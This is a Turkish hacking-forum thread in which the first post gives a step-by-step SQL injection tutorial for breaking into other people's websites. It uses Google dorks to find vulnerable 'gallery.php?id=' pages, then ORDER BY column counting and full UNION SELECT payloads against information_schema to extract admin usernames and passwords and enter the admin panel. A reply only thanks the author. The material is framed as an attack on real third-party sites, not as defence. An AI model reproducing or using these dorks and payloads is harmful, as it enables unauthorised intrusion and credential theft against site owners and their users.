İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Sql | Sabiti Beğenmeyene Ek

10-03-2012 03:05
#1
HaCker DeSire - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2011
Nereden:
İstanbul
Yaş:
25
Mesajlar:
3.267
Teşekkür (Etti):
69
Teşekkür (Aldı):
562
Konular:
466
Ticaret:
(0) %
Bu konular 1 günde - 1 saatde öğrenilmez.
Öğrene Öğrene Bitiremessin !
Masuel olarak giriş.


Sql İnjection nedir???
SQL Injection kelime manasıyla da anlaşılabileceği gibi SQL sorgularının arasına dışarıdan zararlı veri ekleme işlemine verilen isimdir.
Lafı fazla uzatmıycam ve hemen konuya giricem.

DeSire

Öncelikli olarak google arama kodlarını söyleyeyim
1)inurl:'açık kodu'
2)allinurl:'açık kodu'
3)intext:'powered by CMS forum' vs vs gibi kodlarla ararız açıklı siteleri..

şimdi google açalım ve sql injection açığı olan bi site bulalım.Nasıl bulurum diyorsunuz haliyle Okumaya devam edin

inurl:''gallery.php?id=1'' herhangi birini seçin güncel açıklara bakarak yaparsanız daha faydalı olur. ben gallery.php?id= yi örnek olarak verdim.
id=1 li sitelere sırasıyla tıklayın site sonuna ' veya 'a yapın(bu arada sadece id=1 li sitelerde açık olacak diye birşey yok id=134 de olabilir açık olsun yeterki)
site hata verir örnek:
You have an error in your SQL syntax' error veya site kendisini boşa alır
evet sql açıklı sitemizi bulduk şimdi nasıl admin ve şifresini çekicez??


Kod:
 /gallery.php?id=1+order+by+kolon sayısı

şimdi kolon sayısı yerine 8 yazıp entera bastık site normal bi konu veya makale açıldı,9 yazıp entera bastık site hata verdi(You have an error SQL Syntax vs. gibi) demekki kolon sayısı 8 miş..

Şimdi aşağıdaki kodu kullanarak veri tablosunun bulunduğu kolonu bulalım:

Kod:
 /gallery.php?id=-1+union+select+1,2,3,4,5,6,7,8--

kodu yazdınız ve sayılar çıktı 2 gibi(Bu değişebilir her zaman 2 çıkmaz 5 çıkar 3 çıkar yani değişir bizde o çıkan sayı yerine kodu yazarız)
şimdi 2 yi silip ' version() ' yazalım ((tırnak işaretlerini almadan yazıyoruz!))
aşağıdaki gibi

Kod:
index.php?id=-1+union+select+1,version(),3,4,5,6,7,8--]
dEsİReEEEe
Version 5.1.47 community gibi bi version yazdı.

Not!!önemli): Eğer version 4.x.x çıkarsa bundan sonraki anlatım işinize yaramaz.Çünkü version 4 te iş tahmindir kolonları tahmin ederek bruteforce yöntemiyle bulursunuz.
Şimdi 2 deki version() u siliyoruz ve onun yerine

Kod:
group_concat(table_name) yazıyoruz
Sonra en sona

Kod:
+from+information_schema.tables--
yazıyoruz

Yani tam olarak kodumuz böyle oldu:

Kod:
/gallery.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables--

Yukarıdaki kodu yazıp enterladıktan sonra karşımıza information schemadaki tablolar gelecek.tablolara baktık admin,user,users gibisinden bişi bulduk işimize yarayacak olan tabloyu bulduktan sonra
2 kolonunun yerine

Kod:
group_concat(column_name)
yazıyoruz.

Kod:
+from+information_schema.tables olan yeri 
+from+information_schema.columns olarak değiştiriyoruz
DeSire
ve

Kod:
+where+table_name='admin'--
kodumuzu sona ekliyoruz.Buradaki 'admin' yazan yer bulduğunuz tablo adı users,user veya başka birşeyde olabilir.
Yani dediğim gibi yaptıktan sonra tam olarak olması gereken kod şudur:

Kod:
 /gallery.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8+from+information_schema.columns+where+table_name='admin'--
columnler yansıdı (ıd,name,password)
Eğerki yansımazsa admini charlıyarak öğrenicez id ve pass'ı
Onuda şöyle yapıyoruz sırasıyla:

Kod:
/gallery.php?id=-1+union+select+1,(name),3,4,5,6,7,8+from+admin--

Kod:
 /gallery.php?id=-1+union+select+1,(password),3,4,5,6,7,8+from+admin--

Ve sırayla öğrenmiş olduk id ve pw yi.

site sonuna /admin ekleyip admin paneline girdik veya admin panelini bulup girdik site sizindir.Hadi hayırlı uğurlu olsun.


11-03-2012 04:44
#2
CoLTFeeT06 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2011
Nereden:
ANKARA
Yaş:
26
Mesajlar:
1.648
Teşekkür (Etti):
96
Teşekkür (Aldı):
383
Konular:
247
Ticaret:
(0) %
Eline sağlık kardeşim

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı